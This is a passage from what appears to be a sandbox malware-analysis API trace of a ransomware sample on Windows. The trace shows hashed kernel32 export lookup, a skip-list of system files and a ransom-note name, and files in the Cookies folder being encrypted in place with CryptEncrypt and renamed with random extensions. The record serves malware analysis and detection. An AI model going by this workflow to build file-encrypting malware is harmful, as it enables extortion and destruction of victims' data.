lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.513] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.513] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.513] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.513] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.513] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.513] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.513] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.513] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.514] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.514] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.514] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.514] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.514] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.514] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.514] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.514] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.514] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.514] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.514] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.514] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.514] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.514] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.515] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.515] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ") returned 125 [0181.515] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ.LZopptg") returned 133 [0181.515] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweq"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ.LZopptg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweq.lzopptg"), dwFlags=0x0) returned 1 [0181.516] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.516] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.516] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.516] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf73d210, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf73d210, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xab5282e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x165, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur", cAlternateFileName="5P5NRG~1.AZ6")) returned 1 [0181.517] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur", lpString2="DECRYPT-FILES.txt") returned -1 [0181.517] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur", lpString2="autorun.inf") returned -1 [0181.517] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur", lpString2="boot.ini") returned -1 [0181.517] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur", lpString2="desktop.ini") returned -1 [0181.517] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur", lpString2="ntuser.dat") returned -1 [0181.517] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur", lpString2="iconcache.db") returned -1 [0181.517] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur", lpString2="bootsect.bak") returned -1 [0181.517] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur", lpString2="ntuser.dat.log") returned -1 [0181.517] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur", lpString2="thumbs.db") returned -1 [0181.517] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur", lpString2="Bootfont.bin") returned -1 [0181.517] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur") returned 43 [0181.517] lstrcmpiW (lpString1="az6Ur", lpString2="lnk") returned -1 [0181.517] lstrcmpiW (lpString1="az6Ur", lpString2="exe") returned -1 [0181.517] lstrcmpiW (lpString1="az6Ur", lpString2="sys") returned -1 [0181.517] lstrcmpiW (lpString1="az6Ur", lpString2="dll") returned -1 [0181.517] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.517] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur") returned 43 [0181.517] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.517] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur" [0181.517] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.517] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6ur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.518] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=357) returned 1 [0181.518] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.518] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.518] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.518] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.518] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.519] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0181.519] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.519] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.520] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.520] CloseHandle (hObject=0x288) returned 1 [0181.520] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.520] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0181.521] CloseHandle (hObject=0x0) returned 0 [0181.521] CloseHandle (hObject=0x284) returned 1 [0181.521] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.521] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.521] GetTickCount () returned 0x1134c5c [0181.522] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.522] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.522] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.522] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.522] lstrlenA (lpString="kernel32.dll") returned 12 [0181.522] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.522] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.522] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.522] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.522] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.523] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.523] lstrlenA (lpString="ADDATOMA") returned 8 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.523] lstrlenA (lpString="ADDATOMW") returned 8 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.523] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.523] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.523] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.523] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.523] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.523] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.523] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.523] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.523] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.523] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.523] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.523] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.523] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.523] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.523] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.523] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.524] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.524] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.524] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.524] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.524] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.524] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.524] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.524] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.524] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.524] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.524] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.524] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.524] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.524] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.524] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.524] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.524] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.524] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.525] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.525] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.525] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.525] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.525] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.525] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.525] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.525] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.525] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.525] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.525] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.525] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.525] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.525] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.525] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.525] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.525] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.525] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.526] lstrlenA (lpString="BEEP") returned 4 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.526] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.526] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.526] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.526] 